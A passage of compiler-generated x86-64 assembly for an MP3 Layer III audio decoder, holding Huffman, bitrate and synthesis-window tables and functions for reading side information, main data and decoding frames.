208 .value 513 .value 182 .value 107 .value 1025 .value 513 .value 196 .value 76 .value 513 .value 153 .value 168 .value 4097 .value 2049 .value 1025 .value 513 .value 138 .value 197 .value 513 .value 92 .value 209 .value 1025 .value 513 .value 183 .value 123 .value 513 .value 29 .value 210 .value 2305 .value 1025 .value 513 .value 45 .value 211 .value 513 .value 61 .value 198 .value 22010 .value 1025 .value 513 .value 108 .value 169 .value 513 .value 154 .value 212 .value 8193 .value 4097 .value 2049 .value 1025 .value 513 .value 184 .value 139 .value 513 .value 77 .value 199 .value 1025 .value 513 .value 124 .value 213 .value 513 .value 93 .value 225 .value 2049 .value 1025 .value 513 .value 30 .value 226 .value 513 .value 170 .value 185 .value 1025 .value 513 .value 155 .value 227 .value 513 .value 214 .value 109 .value 5121 .value 2561 .value 1537 .value 513 .value 62 .value 513 .value 46 .value 78 .value 513 .value 200 .value 140 .value 1025 .value 513 .value 228 .value 215 .value 1025 .value 513 .value 125 .value 171 .value 229 .value 2561 .value 1025 .value 513 .value 186 .value 94 .value 513 .value 201 .value 513 .value 156 .value 110 .value 2049 .value 513 .value 230 .value 513 .value 13 .value 513 .value 224 .value 14 .value 1025 .value 513 .value 216 .value 141 .value 513 .value 187 .value 202 .value 18945 .value 513 .value 255 .value 16385 .value 14849 .value 8193 .value 4097 .value 2049 .value 1025 .value 513 .value 172 .value 231 .value 513 .value 126 .value 217 .value 1025 .value 513 .value 157 .value 232 .value 513 .value 142 .value 203 .value 2049 .value 1025 .value 513 .value 188 .value 218 .value 513 .value 173 .value 233 .value 1025 .value 513 .value 158 .value 204 .value 513 .value 219 .value 189 .value 4097 .value 2049 .value 1025 .value 513 .value 234 .value 174 .value 513 .value 220 .value 205 .value 1025 .value 513 .value 235 .value 190 .value 513 .value 221 .value 236 .value 2049 .value 1025 .value 513 .value 206 .value 237 .value 513 .value 222 .value 238 .value 15 .value 1025 .value 513 .value 240 .value 31 .value 241 .value 1025 .value 513 .value 242 .value 47 .value 513 .value 243 .value 63 .value 4609 .value 2049 .value 1025 .value 513 .value 244 .value 79 .value 513 .value 245 .value 95 .value 1025 .value 513 .value 246 .value 111 .value 513 .value 247 .value 513 .value 127 .value 143 .value 2561 .value 1025 .value 513 .value 248 .value 249 .value 1025 .value 513 .value 159 .value 175 .value 250 .value 2049 .value 1025 .value 513 .value 251 .value 191 .value 513 .value 252 .value 207 .value 1025 .value 513 .value 253 .value 223 .value 513 .value 254 .value 239 .value 513 .value 0 .value 2049 .value 1025 .value 513 .value 8 .value 4 .value 513 .value 1 .value 2 .value 2049 .value 1025 .value 513 .value 12 .value 10 .value 513 .value 3 .value 6 .value 1537 .value 513 .value 9 .value 513 .value 5 .value 7 .value 1025 .value 513 .value 14 .value 13 .value 513 .value 15 .value 11 .value 4097 .value 2049 .value 1025 .value 513 .value 0 .value 1 .value 513 .value 2 .value 3 .value 1025 .value 513 .value 4 .value 5 .value 513 .value 6 .value 7 .value 2049 .value 1025 .value 513 .value 8 .value 9 .value 513 .value 10 .value 11 .value 1025 .value 513 .value 12 .value 13 .value 513 .value 14 .value 15 .align 32 .type g_mpeg1_bitrates, @object .size g_mpeg1_bitrates, 180 g_mpeg1_bitrates: .long 0 .long 32000 .long 64000 .long 96000 .long 128000 .long 160000 .long 192000 .long 224000 .long 256000 .long 288000 .long 320000 .long 352000 .long 384000 .long 416000 .long 448000 .long 0 .long 32000 .long 48000 .long 56000 .long 64000 .long 80000 .long 96000 .long 112000 .long 128000 .long 160000 .long 192000 .long 224000 .long 256000 .long 320000 .long 384000 .long 0 .long 32000 .long 40000 .long 48000 .long 56000 .long 64000 .long 80000 .long 96000 .long 112000 .long 128000 .long 160000 .long 192000 .long 224000 .long 256000 .long 320000 .align 8 .type g_sampling_frequency, @object .size g_sampling_frequency, 12 g_sampling_frequency: .long 44100 .long 48000 .long 32000 .align 32 .type mpeg1_scalefac_sizes, @object .size mpeg1_scalefac_sizes, 128 mpeg1_scalefac_sizes: .long 0 .long 0 .long 0 .long 1 .long 0 .long 2 .long 0 .long 3 .long 3 .long 0 .long 1 .long 1 .long 1 .long 2 .long 1 .long 3 .long 2 .long 1 .long 2 .long 2 .long 2 .long 3 .long 3 .long 1 .long 3 .long 2 .long 3 .long 3 .long 4 .long 2 .long 4 .long 3 .globl g_huffman_main .section .data.rel.local .align 32 .type g_huffman_main, @object .size g_huffman_main, 544 g_huffman_main: .quad 0 .value 0 .byte 0 .zero 5 .quad g_huffman_table .value 7 .byte 0 .zero 5 .quad g_huffman_table+14 .value 17 .byte 0 .zero 5 .quad g_huffman_table+48 .value 17 .byte 0 .zero 5 .quad 0 .value 0 .byte 0 .zero 5 .quad g_huffman_table+82 .value 31 .byte 0 .zero 5 .quad g_huffman_table+144 .value 31 .byte 0 .zero 5 .quad g_huffman_table+206 .value 71 .byte 0 .zero 5 .quad g_huffman_table+348 .value 71 .byte 0 .zero 5 .quad g_huffman_table+490 .value 71 .byte 0 .zero 5 .quad g_huffman_table+632 .value 127 .byte 0 .zero 5 .quad g_huffman_table+886 .value 127 .byte 0 .zero 5 .quad g_huffman_table+1140 .value 127 .byte 0 .zero 5 .quad g_huffman_table+1394 .value 511 .byte 0 .zero 5 .quad 0 .value 0 .byte 0 .zero 5 .quad g_huffman_table+2416 .value 511 .byte 0 .zero 5 .quad g_huffman_table+3438 .value 511 .byte 1 .zero 5 .quad g_huffman_table+3438 .value 511 .byte 2 .zero 5 .quad g_huffman_table+3438 .value 511 .byte 3 .zero 5 .quad g_huffman_table+3438 .value 511 .byte 4 .zero 5 .quad g_huffman_table+3438 .value 511 .byte 6 .zero 5 .quad g_huffman_table+3438 .value 511 .byte 8 .zero 5 .quad g_huffman_table+3438 .value 511 .byte 10 .zero 5 .quad g_huffman_table+3438 .value 511 .byte 13 .zero 5 .quad g_huffman_table+4460 .value 512 .byte 4 .zero 5 .quad g_huffman_table+4460 .value 512 .byte 5 .zero 5 .quad g_huffman_table+4460 .value 512 .byte 6 .zero 5 .quad g_huffman_table+4460 .value 512 .byte 7 .zero 5 .quad g_huffman_table+4460 .value 512 .byte 8 .zero 5 .quad g_huffman_table+4460 .value 512 .byte 9 .zero 5 .quad g_huffman_table+4460 .value 512 .byte 11 .zero 5 .quad g_huffman_table+4460 .value 512 .byte 13 .zero 5 .quad g_huffman_table+5484 .value 31 .byte 0 .zero 5 .quad g_huffman_table+4522 .value 31 .byte 0 .zero 5 .section .rodata .align 32 .type ci, @object .size ci, 32 ci: .long -1088841318 .long -1089931837 .long -1096223293 .long -1103269724 .long -1111322788 .long -1121456226 .long -1133992162 .long -1150125133 .align 32 .type cs, @object .size cs, 32 cs: .long 1062962345 .long 1063369176 .long 1064508131 .long 1065073288 .long 1065278021 .long 1065339140 .long 1065351522 .long 1065353099 .align 32 .type ca, @object .size ca, 32 ca: .long -1090275837 .long -1091467557 .long -1096781069 .long -1103476889 .long -1111379965 .long -1121465353 .long -1133993236 .long -1150125133 .align 16 .type is_ratios, @object .size is_ratios, 24 is_ratios: .long 0 .long 1049178268 .long 1058262326 .long 1065353216 .long 1071494105 .long 1081006572 .align 32 .type g_synth_dtbl, @object .size g_synth_dtbl, 2048 g_synth_dtbl: .long 0 .long -1216348044 .long -1216348044 .long -1216348044 .long -1216348044 .long -1216348044 .long -1216348044 .long -1207959436 .long -1207959436 .long -1207959436 .long -1207959436 .long -1203765349 .long -1203765349 .long -1199570987 .long -1199570987 .long -1197473784 .long -1197473784 .long -1195376603 .long -1193279423 .long -1193279423 .long -1191182379 .long -1190133767 .long -1189085176 .long -1188036586 .long -1185939474 .long -1184890883 .long -1182793715 .long -1182269454 .long -1181220864 .long -1180172273 .long -1178599422 .long -1177550831 .long -1175977980 .long -1174929424 .long -1173618681 .long -1172832256 .long -1172045830 .long -1170997240 .long -1169948666 .long -1168900093 .long -1167589372 .long -1166278651 .long -1165492221 .long -1164836861 .long -1164050435 .long -1163264001 .long -1162477566 .long -1161691132 .long -1160773633 .long -1159856124 .long -1159069699 .long -1158021117 .long -1157365761 .long -1156907007 .long -1156382720 .long -1155923966 .long -1155465216 .long -1154940930 .long -1154482175 .long -1154023426 .long -1153564672 .long -1153171455 .long -1152778242 .long -1152385025 .long 995426304 .long 995753984 .long 996016127 .long 996212738 .long 996343807 .long 996409344 .long 996409344 .long 996343807 .long 996147201 .long 995950590 .long 995557378 .long 995098623 .long 994574337 .long 993853439 .long 993067009 .long 992149506 .long 991035391 .long 989724670 .long 986972163 .long 983957500 .long 979632128 .long 971505668 .long -1207959436 .long -1173356551 .long -1164967934 .long -1159856124 .long -1155989503 .long -1153105922 .long -1150025726 .long -1147994112 .long -1146257408 .long -1144487937 .long -1142587392 .long -1140735999 .long -1139720192 .long -1138671616 .long -1137590272 .long -1136476160 .long -1135345664 .long -1134182400 .long -1133002752 .long -1132134400 .long -1131536384 .long -1130938368 .long -1130340352 .long -1129742336 .long -1129152512 .long -1128579072 .long -1128013824 .long -1127464960 .long -1126940672 .long -1126440960 .long -1125965824 .long -1125531648 .long -1125130240 .long -1124777984 .long -1124458496 .long -1124204544 .long -1124036608 .long -1123962880 .long -1123921920 .long -1123913728 .long -1123942400 .long -1124012032 .long 1023320064 .long 1023016960 .long 1022623744 .long 1022140416 .long 1021558784 .long 1020878848 .long 1020100608 .long 1019207680 .long 1018216448 .long 1017118720 .long 1015898112 .long 1014136832 .long 1011253249 .long 1008156672 .long 1003028480 .long 993591296 .long -1170997240 .long -1148190721 .long -1140310016 .long -1135902720 .long -1131880448 .long -1129480192 .long -1126989824 .long -1124417536 .long -1122918400 .long -1121554432 .long -1120157696 .long -1118736384 .long -1117286400 .long -1115820032 .long -1115011072 .long -1114267648 .long -1113520128 .long -1112774656 .long -1112033280 .long -1111300096 .long -1110579200 .long -1109870592 .long -1109182464 .long -1108514816 .long -1107873792 .long -1107278848 .long -1106990080 .long -1106719744 .long -1106470912 .long -1106244608 .long -1106042880 .long -1105869824 .long -1105724416 .long -1105610752 .long -1105530880 .long -1105486848 .long -1105479680 .long -1105511424 .long -1105585152 .long -1105700864 .long -1105862656 .long -1106070528 .long -1106326528 .long -1106632704 .long -1106989056 .long -1107501056 .long -1108426752 .long -1109463040 .long 1036873728 .long 1035614208 .long 1034240000 .long 1032751104 .long 1030488064 .long 1027043328 .long 1023320064 .long 1015496704 .long 982253566 .long -1132888065 .long -1123770368 .long -1118945280 .long -1114789888 .long -1112158208 .long -1109422080 .long -1106939904 .long -1105470464 .long -1103954944 .long -1102393344 .long -1100787712 .long -1099142144 .long -1098183168 .long -1097323520 .long -1096447488 .long -1095556608 .long -1094652928 .long -1093737472 .long -1092812288 .long -1091878912 .long -1090939392 .long -1090257152 .long -1089783808 .long -1089310464 .long -1088837632 .long -1088366592 .long -1087898112 .long -1087433472 .long -1086973696 .long -1086519808 .long -1086072576 .long -1085633280 .long -1085202944 .long -1084782080 .long -1084372480 .long -1083974400 .long -1083589120 .long -1083217664 .long -1082860544 .long -1082518784 .long -1082193408 .long -1082007808 .long -1081862528 .long -1081726464 .long -1081600128 .long -1081483520 .long -1081377280 .long -1081281408 .long -1081196160 .long -1081121920 .long -1081058816 .long -1081006976 .long -1080966400 .long -1080937472 .long -1080920064 .long 1066569472 .long 1066563584 .long 1066546176 .long 1066517248 .long 1066476672 .long 1066424832 .long 1066361728 .long 1066287488 .long 1066202240 .long 1066106368 .long 1066000128 .long 1065883520 .long 1065757184 .long 1065621120 .long 1065475840 .long 1065290240 .long 1064964864 .long 1064623104 .long 1064265984 .long 1063894528 .long 1063509248 .long 1063111168 .long 1062701568 .long 1062280704 .long 1061850368 .long 1061411072 .long 1060963840 .long 1060509952 .long 1060050176 .long 1059585536 .long 1059117056 .long 1058646016 .long 1058173184 .long 1057699840 .long 1057226496 .long 1056544256 .long 1055604736 .long 1054671360 .long 1053746176 .long 1052830720 .long 1051927040 .long 1051036160 .long 1050160128 .long 1049300480 .long 1048341504 .long 1046695936 .long 1045090304 .long 1043528704 .long 1042013184 .long 1040543744 .long 1038061568 .long 1035325440 .long 1032693760 .long 1028538368 .long 1023713280 .long 1014595583 .long -1165230082 .long -1131986944 .long -1124163584 .long -1120440320 .long -1116995584 .long -1114732544 .long -1113243648 .long -1111869440 .long 1036873728 .long 1038020608 .long 1039056896 .long 1039982592 .long 1040494592 .long 1040850944 .long 1041157120 .long 1041413120 .long 1041620992 .long 1041782784 .long 1041898496 .long 1041972224 .long 1042003968 .long 1041996800 .long 1041952768 .long 1041872896 .long 1041759232 .long 1041613824 .long 1041440768 .long 1041239040 .long 1041012736 .long 1040763904 .long 1040493568 .long 1040204800 .long 1039609856 .long 1038968832 .long 1038301184 .long 1037613056 .long 1036904448 .long 1036183552 .long 1035450368 .long 1034708992 .long 1033963520 .long 1033216000 .long 1032472576 .long 1031663616 .long 1030197248 .long 1028747264 .long 1027325952 .long 1025929216 .long 1024565248 .long 1023066112 .long 1020493824 .long 1018003456 .long 1015603200 .long 1011580928 .long 1007173632 .long 999292927 .long 976486408 .long -1153892352 .long -1144455168 .long -1139326976 .long -1136230399 .long -1133346816 .long -1131585536 .long -1130364928 .long -1129267200 .long -1128275968 .long -1127383040 .long -1126604800 .long -1125924864 .long -1125343232 .long -1124859904 .long -1124466688 .long 1023320064 .long 1023471616 .long 1023541248 .long 1023569920 .long 1023561728 .long 1023520768 .long 1023447040 .long 1023279104 .long 1023025152 .long 1022705664 .long 1022353408 .long 1021952000 .long 1021517824 .long 1021042688 .long 1020542976 .long 1020018688 .long 1019469824 .long 1018904576 .long 1018331136 .long 1017741312 .long 1017143296 .long 1016545280 .long 1015947264 .long 1015349248 .long 1014480896 .long 1013301248 .long 1012137984 .long 1011007488 .long 1009893376 .long 1008812032 .long 1007763456 .long 1006747649 .long 1004896256 .long 1002995711 .long 1001226240 .long 999489536 .long 997457922 .long 994377726 .long 991494145 .long 987627524 .long 982515714 .long 974127097 .long 939524212 .long -1175977980 .long -1167851520 .long -1163526148 .long -1160511485 .long -1157758978 .long -1156448257 .long -1155334142 .long -1154416639 .long -1153630209 .long -1152909311 .long -1152385025 .long -1151926270 .long -1151533058 .long -1151336447 .long -1151139841 .long -1151074304 .long -1151074304 .long -1151139841 .long -1151270910 .long -1151467521 .long -1151729664 .long 995426304 .long 995098623 .long 994705406 .long 994312193 .long 993918976 .long 993460222 .long 993001473 .long 992542718 .long 992018432 .long 991559682 .long 991100928 .long 990576641 .long 990117887 .long 989462531 .long 988413949 .long 987627524 .long 986710015 .long 985792516 .long 985006082 .long 984219647 .long 983433213 .long 982646787 .long 981991427 .long 981204997 .long 979894276 .long 978583555 .long 977534982 .long 976486408 .long 975437818 .long 974651392 .long 973864967 .long 972554224 .long 971505668 .long 969932817 .long 968884226 .long 967311375 .long 966262784 .long 965214194 .long 964689933 .long 962592765 .long 961544174 .long 959447062 .long 958398472 .long 957349881 .long 956301269 .long 954204225 .long 954204225 .long 952107045 .long 950009864 .long 950009864 .long 947912661 .long 947912661 .long 943718299 .long 943718299 .long 939524212 .long 939524212 .long 939524212 .long 939524212 .long 931135604 .long 931135604 .long 931135604 .long 931135604 .long 931135604 .long 931135604 .data .align 4 .type hsynth_init, @object .size hsynth_init, 4 hsynth_init: .long 1 .align 4 .type synth_init, @object .size synth_init, 4 synth_init: .long 1 .local g_main_data_vec .comm g_main_data_vec,8192,32 .local g_main_data_ptr .comm g_main_data_ptr,8,8 .local g_main_data_idx .comm g_main_data_idx,4,4 .local g_main_data_top .comm g_main_data_top,4,4 .local side_info_vec .comm side_info_vec,144,32 .local side_info_ptr .comm side_info_ptr,8,8 .local side_info_idx .comm side_info_idx,4,4 .section .rodata .align 32 .type g_sf_band_indices, @object .size g_sf_band_indices, 444 g_sf_band_indices: .long 0 .long 4 .long 8 .long 12 .long 16 .long 20 .long 24 .long 30 .long 36 .long 44 .long 52 .long 62 .long 74 .long 90 .long 110 .long 134 .long 162 .long 196 .long 238 .long 288 .long 342 .long 418 .long 576 .long 0 .long 4 .long 8 .long 12 .long 16 .long 22 .long 30 .long 40 .long 52 .long 66 .long 84 .long 106 .long 136 .long 192 .long 0 .long 4 .long 8 .long 12 .long 16 .long 20 .long 24 .long 30 .long 36 .long 42 .long 50 .long 60 .long 72 .long 88 .long 106 .long 128 .long 156 .long 190 .long 230 .long 276 .long 330 .long 384 .long 576 .long 0 .long 4 .long 8 .long 12 .long 16 .long 22 .long 28 .long 38 .long 50 .long 64 .long 80 .long 100 .long 126 .long 192 .long 0 .long 4 .long 8 .long 12 .long 16 .long 20 .long 24 .long 30 .long 36 .long 44 .long 54 .long 66 .long 82 .long 102 .long 126 .long 156 .long 194 .long 240 .long 296 .long 364 .long 448 .long 550 .long 576 .long 0 .long 4 .long 8 .long 12 .long 16 .long 22 .long 30 .long 42 .long 58 .long 78 .long 104 .long 138 .long 180 .long 192 .local fp .comm fp,8,8 .local g_frame_header .comm g_frame_header,48,32 .local g_side_info .comm g_side_info,344,32 .local g_main_data .comm g_main_data,10128,32 .text .type Requantize_Pow_43, @function Requantize_Pow_43: .LFB6: .cfi_startproc push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -4[rbp], edi mov eax, DWORD PTR -4[rbp] test rax, rax js .L2 pxor xmm2, xmm2 cvtsi2ss xmm2, rax movd eax, xmm2 jmp .L3 .L2: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2ss xmm0, rdx addss xmm0, xmm0 movd eax, xmm0 .L3: movss xmm1, DWORD PTR .LC1[rip] movd xmm0, eax call powf@PLT leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size Requantize_Pow_43, .-Requantize_Pow_43 .type Decode_L3, @function Decode_L3: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 2336 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov eax, DWORD PTR g_frame_header[rip+28] cmp eax, 3 jne .L6 mov eax, 1 jmp .L7 .L6: mov eax, 2 .L7: mov DWORD PTR -2324[rbp], eax mov DWORD PTR -2332[rbp], 0 jmp .L8 .L13: mov DWORD PTR -2328[rbp], 0 jmp .L9 .L10: mov edx, DWORD PTR -2328[rbp] mov eax, DWORD PTR -2332[rbp] mov esi, edx mov edi, eax call L3_Requantize mov edx, DWORD PTR -2328[rbp] mov eax, DWORD PTR -2332[rbp] mov esi, edx mov edi, eax call L3_Reorder add DWORD PTR -2328[rbp], 1 .L9: mov eax, DWORD PTR -2328[rbp] cmp eax, DWORD PTR -2324[rbp] jb .L10 mov eax, DWORD PTR -2332[rbp] mov edi, eax call L3_Stereo mov DWORD PTR -2328[rbp], 0 jmp .L11 .L12: mov edx, DWORD PTR -2328[rbp] mov eax, DWORD PTR -2332[rbp] mov esi, edx mov edi, eax call L3_Antialias mov edx, DWORD PTR -2328[rbp] mov eax, DWORD PTR -2332[rbp] mov esi, edx mov edi, eax call L3_Hybrid_Synthesis mov edx, DWORD PTR -2328[rbp] mov eax, DWORD PTR -2332[rbp] mov esi, edx mov edi, eax call L3_Frequency_Inversion lea rdx, -2320[rbp] mov ecx, DWORD PTR -2328[rbp] mov eax, DWORD PTR -2332[rbp] mov esi, ecx mov edi, eax call L3_Subband_Synthesis add DWORD PTR -2328[rbp], 1 .L11: mov eax, DWORD PTR -2328[rbp] cmp eax, DWORD PTR -2324[rbp] jb .L12 mov eax, DWORD PTR g_frame_header[rip+16] mov eax, eax lea rdx, 0[0+rax*4] lea rax, g_sampling_frequency[rip] mov eax, DWORD PTR [rdx+rax] mov edx, eax lea rax, -2320[rbp] mov esi, 576 mov rdi, rax call audio_write add DWORD PTR -2332[rbp], 1 .L8: cmp DWORD PTR -2332[rbp], 1 jbe .L13 mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L15 call __stack_chk_fail@PLT .L15: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size Decode_L3, .-Decode_L3 .type Get_Bytes, @function Get_Bytes: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov DWORD PTR -20[rbp], edi mov QWORD PTR -32[rbp], rsi mov DWORD PTR -8[rbp], 0 jmp .L17 .L20: call Get_Byte mov DWORD PTR -4[rbp], eax cmp DWORD PTR -4[rbp], -1 jne .L18 mov eax, -1 jmp .L19 .L18: mov eax, DWORD PTR -8[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -32[rbp] add rdx, rax mov eax, DWORD PTR -4[rbp] mov DWORD PTR [rdx], eax add DWORD PTR -8[rbp], 1 .L17: mov eax, DWORD PTR -8[rbp] cmp DWORD PTR -20[rbp], eax ja .L20 mov eax, 0 .L19: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size Get_Bytes, .-Get_Bytes .section .rodata .LC2: .string "main_data_size = %d\n" .text .type Get_Main_Data, @function Get_Main_Data: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov DWORD PTR -20[rbp], edi mov DWORD PTR -24[rbp], esi cmp DWORD PTR -20[rbp], 1500 jbe .L22 mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -20[rbp] lea rsi, .LC2[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT .L22: mov eax, DWORD PTR g_main_data_top[rip] cmp DWORD PTR -24[rbp], eax jbe .L23 mov eax, DWORD PTR g_main_data_top[rip] mov eax, eax lea rdx, 0[0+rax*4] lea rax, g_main_data_vec[rip] add rdx, rax mov eax, DWORD PTR -20[rbp] mov rsi, rdx mov edi, eax call Get_Bytes lea rax, g_main_data_vec[rip] mov QWORD PTR g_main_data_ptr[rip], rax mov DWORD PTR g_main_data_idx[rip], 0 mov edx, DWORD PTR g_main_data_top[rip] mov eax, DWORD PTR -20[rbp] add eax, edx mov DWORD PTR g_main_data_top[rip], eax mov eax, -1 jmp .L24 .L23: mov DWORD PTR -8[rbp], 0 jmp .L25 .L26: mov eax, DWORD PTR g_main_data_top[rip] sub eax, DWORD PTR -24[rbp] mov edx, eax mov eax, DWORD PTR -8[rbp] add eax, edx mov eax, eax lea rdx, 0[0+rax*4] lea rax, g_main_data_vec[rip] mov eax, DWORD PTR [rdx+rax] mov edx, DWORD PTR -8[rbp] movsx rdx, edx lea rcx, 0[0+rdx*4] lea rdx, g_main_data_vec[rip] mov DWORD PTR [rcx+rdx], eax add DWORD PTR -8[rbp], 1 .L25: mov eax, DWORD PTR -8[rbp] cmp DWORD PTR -24[rbp], eax ja .L26 call Get_Filepos mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -24[rbp] lea rdx, 0[0+rax*4] lea rax, g_main_data_vec[rip] add rdx, rax mov eax, DWORD PTR -20[rbp] mov rsi, rdx mov edi, eax call Get_Bytes lea rax, g_main_data_vec[rip] mov QWORD PTR g_main_data_ptr[rip], rax mov DWORD PTR g_main_data_idx[rip], 0 mov edx, DWORD PTR -24[rbp] mov eax, DWORD PTR -20[rbp] add eax, edx mov DWORD PTR g_main_data_top[rip], eax mov eax, 0 .L24: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size Get_Main_Data, .-Get_Main_Data .section .rodata .LC3: .string "framesize = %d\n" .text .type Read_Audio_L3, @function Read_Audio_L3: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov eax, DWORD PTR g_frame_header[rip+28] cmp eax, 3 jne .L28 mov eax, 1 jmp .L29 .L28: mov eax, 2 .L29: mov DWORD PTR -16[rbp], eax mov eax, DWORD PTR g_frame_header[rip+4] lea edx, -1[rax] mov eax, DWORD PTR g_frame_header[rip+12] mov ecx, eax mov edx, edx mov rax, rdx sal rax, 4 sub rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_mpeg1_bitrates[rip] mov edx, DWORD PTR [rdx+rax] mov eax, edx sal eax, 3 add eax, edx sal eax, 4 mov ecx, eax mov eax, DWORD PTR g_frame_header[rip+16] mov eax, eax lea rdx, 0[0+rax*4] lea rax, g_sampling_frequency[rip] mov esi, DWORD PTR [rdx+rax] mov eax, ecx mov edx, 0 div esi mov edx, eax mov eax, DWORD PTR g_frame_header[rip+20] add eax, edx mov DWORD PTR -12[rbp], eax cmp DWORD PTR -12[rbp], 2000 jbe .L30 mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -12[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT mov eax, -1 jmp .L31 .L30: cmp DWORD PTR -16[rbp], 1 jne .L32 mov eax, 17 jmp .L33 .L32: mov eax, 32 .L33: mov DWORD PTR -8[rbp], eax mov eax, DWORD PTR -12[rbp] sub eax, DWORD PTR -8[rbp] sub eax, 4 mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR g_frame_header[rip+8] test eax, eax jne .L34 sub DWORD PTR -4[rbp], 2 .L34: mov eax, DWORD PTR -8[rbp] mov edi, eax call Get_Sideinfo call Get_Filepos cmp eax, -1 jne .L35 mov eax, -1 jmp .L31 .L35: mov edi, 9 call Get_Side_Bits mov DWORD PTR g_side_info[rip], eax mov eax, DWORD PTR g_frame_header[rip+28] cmp eax, 3 jne .L36 mov edi, 5 call Get_Side_Bits mov DWORD PTR g_side_info[rip+4], eax jmp .L37 .L36: mov edi, 3 call Get_Side_Bits mov DWORD PTR g_side_info[rip+4], eax .L37: mov DWORD PTR -36[rbp], 0 jmp .L38 .L41: mov DWORD PTR -28[rbp], 0 jmp .L39 .L40: mov edi, 1 call Get_Side_Bits mov ecx, DWORD PTR -28[rbp] mov edx, DWORD PTR -36[rbp] sal rdx, 2 add rdx, rcx lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax add DWORD PTR -28[rbp], 1 .L39: cmp DWORD PTR -28[rbp], 3 jbe .L40 add DWORD PTR -36[rbp], 1 .L38: mov eax, DWORD PTR -36[rbp] cmp eax, DWORD PTR -16[rbp] jb .L41 mov DWORD PTR -32[rbp], 0 jmp .L42 .L55: mov DWORD PTR -36[rbp], 0 jmp .L43 .L54: mov edi, 12 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 8 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov edi, 9 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 12 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov edi, 8 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 16 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov edi, 4 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 20 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov edi, 1 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 24 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov edx, DWORD PTR -36[rbp] mov eax, DWORD PTR -32[rbp] add rax, rax add rax, rdx add rax, 24 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L44 mov edi, 2 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 28 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov edi, 1 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 32 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov DWORD PTR -24[rbp], 0 jmp .L45 .L46: mov edi, 5 call Get_Side_Bits mov ecx, eax mov edi, DWORD PTR -24[rbp] mov edx, DWORD PTR -32[rbp] mov esi, DWORD PTR -36[rbp] mov rax, rdx add rax, rax add rax, rdx add rax, rax mov rdx, rsi add rdx, rdx add rdx, rsi add rax, rdx add rax, rdi add rax, 36 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov DWORD PTR [rdx+rax], ecx add DWORD PTR -24[rbp], 1 .L45: cmp DWORD PTR -24[rbp], 1 jbe .L46 mov DWORD PTR -20[rbp], 0 jmp .L47 .L48: mov edi, 3 call Get_Side_Bits mov ecx, eax mov edi, DWORD PTR -20[rbp] mov edx, DWORD PTR -32[rbp] mov esi, DWORD PTR -36[rbp] mov rax, rdx add rax, rax add rax, rdx add rax, rax mov rdx, rsi add rdx, rdx add rdx, rsi add rax, rdx add rax, rdi add rax, 48 lea rdx, 